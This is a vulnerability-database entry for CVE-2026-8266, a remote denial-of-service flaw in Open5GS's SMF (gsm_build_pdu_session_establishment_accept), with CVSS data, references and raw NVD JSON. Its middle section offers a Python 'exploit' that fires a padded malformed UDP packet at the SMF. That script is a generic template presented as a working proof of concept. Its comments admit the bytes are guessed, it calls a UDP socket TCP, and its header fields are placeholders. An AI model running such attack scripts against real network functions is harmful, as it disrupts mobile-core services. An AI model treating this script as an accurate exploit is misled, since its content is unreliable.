CVE-2026-8266

Description

A vulnerability was detected in Open5GS up to 2.7.7. This affects the function gsm_build_pdu_session_establishment_accept of the file /src/smf/gsm-build.c of the component SMF. The manipulation results in denial of service. The attack can be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE

Open5GS <= 2.7.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target Configuration
# In a real scenario, replace this with the actual IP of the Open5GS SMF interface
SMF_IP = "127.0.0.1" 
SMF_PORT = 8805  # Example port, actual service ports may vary

def craft_malformed_pdu():
    """
    Crafts a malformed packet targeting the PDU Session Establishment Accept logic.
    This attempts to trigger the vulnerability in gsm_build_pdu_session_establishment_accept.
    """
    # Simplified representation of a GTPv2 or NAS header
    # This payload is designed to hit the specific parsing flaw mentioned in the advisory
    # Sending excessive or unexpected data to trigger the DoS condition
    
    # Example header structure (Generic GTPv2-C header)
    # Flags: 0x32 (Version 2, Piggybacking, etc)
    # Message Type: 0xc3 (Create Session Request or similar)
    # Length: Calculated dynamically or set to trigger overflow
    header = struct.pack('!BBHIIB', 0x32, 0, 0, 0, 0, 0)
    
    # Malformed payload: Buffer with specific pattern intended to crash the SMF build function
    # The specific bytes would depend on the exact disassembly of the vulnerable function
    payload = b'A' * 1024 + b'\x00\x00\xff\xff'
    
    return header + payload

def send_exploit():
    print(f"[*] Attempting to connect to Open5GS SMF at {SMF_IP}:{SMF_PORT}...")
    try:
        # Create a TCP socket (Note: Actual GTP uses UDP, but this is a PoC template)
        # For GTPv2-C, socket.SOCK_DGRAM should be used.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        
        packet = craft_malformed_pdu()
        sock.sendto(packet, (SMF_IP, SMF_PORT))
        print("[+] Malformed packet sent. Check if the SMF service crashed.")
        
    except Exception as e:
        print(f"[-] Error during exploit execution: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8266/
[4] VulDB https://vuldb.com/cve/CVE-2026-8266
[5] https://github.com/open5gs/open5gs/
[6] https://github.com/open5gs/open5gs/issues/4447
[7] https://vuldb.com/submit/808483
[8] https://vuldb.com/vuln/362563
[9] https://vuldb.com/vuln/362563/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8266", "sourceIdentifier": "[email protected]", "published": "2026-05-11T04:16:20.060", "lastModified": "2026-05-12T17:20:53.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Open5GS up to 2.7.7. This affects the function gsm_build_pdu_session_establishment_accept of the file /src/smf/gsm-build.c of the component SMF. The manipulation results in denial of service. The attack can be launched remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.7", "matchCriteriaId": "0A46BC99-08E7-4D40-A908-76121E4AFCD5"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/open5gs/open5gs/issues/4447", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/submit/808483", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362563", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/vuln/362563/cti", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}]}}